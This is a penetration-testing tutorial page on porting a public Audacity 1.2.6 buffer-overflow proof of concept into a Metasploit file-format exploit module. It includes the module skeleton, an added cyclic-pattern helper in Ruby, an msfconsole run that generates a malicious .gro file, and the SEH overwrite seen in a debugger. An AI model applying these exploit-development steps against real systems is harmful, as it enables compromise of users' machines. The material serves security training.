
Using the Egghunter Mixin

The MSF egghunter mixin is a wonderful module which can be of great use in exploit development. If you're not familiar with the concepts of egghunters, read this.

A recent vulnerability in the Audacity Audio Editor presented us with an opportunity to examine this mixin in greater depth. In the next module, we will exploit Audacity and create a Metasploit file format exploit module for it. We will not focus on the exploitation method itself or the theory behind it - but dive right into the practical usage of the Egghunter mixin.

Setting up Audacity

  1. Download and install the vulnerable software on your XP SP2 box:
     ./archive/audacity-win-1.2.6.exe
     ./archive/LADSPA_plugins-win-0.4.15.exe
  2. Download and examine the original POC, taken from : http://milw0rm.com/exploits/7634

Porting the PoC

Let's port this POC to an MSF file format exploit module. We can use an existing module to get a general template. The zinfaudioplayer221_pls.rb exploit provides us with a good start.

Our skeleton exploit should look similar to this. Notice our buffer being generated here:

 def exploit
   buff = Rex::Text.pattern_create(2000)
   print_status("Creating '#{datastore['FILENAME']}' file ...")
   file_create(buff)
 end



We use Rex::Text.pattern_create(2000) to create a unique, non-repeating string of 2000 bytes. Because every 4-byte window of the pattern is unique, any value we later see in a register or in the SEH chain can be mapped straight back to its offset in the buffer.
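To show what the pattern actually is and how an overwritten value is mapped back to a buffer offset, here is a small Ruby re-implementation of the cyclic-pattern idea, added for this page. It is not Metasploit's own Rex::Text code; the function names pattern_create, pattern_offset and unique_windows? are our own, and the sample register value 0x41356141 is constructed for the example.

```ruby
# Added example (not Metasploit's Rex::Text code): the cyclic pattern that
# pattern_create builds and the reverse lookup that pattern_offset performs.
# Character sets match the Metasploit defaults: upper, lower, digit.
UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a

# Maximum length before the pattern would start to repeat (26 * 26 * 10 * 3).
MAX_UNIQUE = UPPER.size * LOWER.size * DIGITS.size * 3

# Build `length` bytes of "Aa0Aa1Aa2...": every 3-byte chunk is unique,
# so every 4-byte window inside the pattern is unique as well.
def pattern_create(length)
  raise ArgumentError, "length must be <= #{MAX_UNIQUE}" if length > MAX_UNIQUE
  buf = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.size >= length
      end
    end
  end
  buf[0, length]
end

# Turn what the debugger shows into the bytes as they sit in the buffer.
# A 32-bit value such as 0x41356141 (constructed example) is little-endian,
# so packing it with 'V' recovers the original byte order "Aa5A".
def query_to_bytes(query)
  if query =~ /\A0x[0-9a-f]{1,8}\z/i
    [query.hex].pack('V')
  else
    query
  end
end

# Offset of `query` (ASCII or 0x-prefixed hex) inside a pattern of `length`
# bytes, or nil when the value did not come from the pattern at all
# (which itself is useful to know: the overwrite came from somewhere else).
def pattern_offset(query, length = MAX_UNIQUE)
  pattern_create(length).index(query_to_bytes(query))
end

# Self-check: confirm that no `width`-byte window repeats inside `buf`.
# This is the property that makes the offset lookup unambiguous.
def unique_windows?(buf, width = 4)
  seen = {}
  (0..buf.size - width).each do |i|
    win = buf[i, width]
    return false if seen[win]
    seen[win] = true
  end
  true
end

if __FILE__ == $0
  buf = pattern_create(2000)
  puts buf[0, 40]
  puts "4-byte windows unique: #{unique_windows?(buf)}"
  puts "offset of 0x41356141: #{pattern_offset('0x41356141', 2000)}"
end
```

Run it as a script to see the first 40 bytes of the 2000-byte pattern and the offset lookup; in the debugger session described on this page, the same lookup is what turns an overwritten handler address into the position in evil.gro that needs to be controlled.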

Once we have the POC ported, we generate the exploit file and transfer it to our Windows box. Use the generic/debug_trap payloads to begin with.


root@bt4:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.3-testing [core:3.3 api:1.0]
+ -- --=[ 399 exploits - 246 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 182 aux

msf exploit(audacity) > show options

Module options:

Name       Current Setting Required Description
----       --------------- -------- -----------
FILENAME   evil.gro        yes      The file name.
OUTPUTPATH /var/www        yes      The location of the file.


Payload options (generic/debug_trap):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Audacity Universal 1.2


msf exploit(audacity) > exploit

[*] Creating 'evil.gro' file ...
[*] Generated output file /var/www/evil.gro
[*] Exploit completed, but no session was created.
msf exploit(audacity) >


We open Audacity, attach a debugger to it, and import the generated .gro MIDI file.



We immediately get an exception from Audacity, and the debugger pauses:



A quick look at the SEH chain shows that we have overwritten an exception handler.


We pass the exception to the program (Shift+F9) and see the following:

© Offensive Security 2009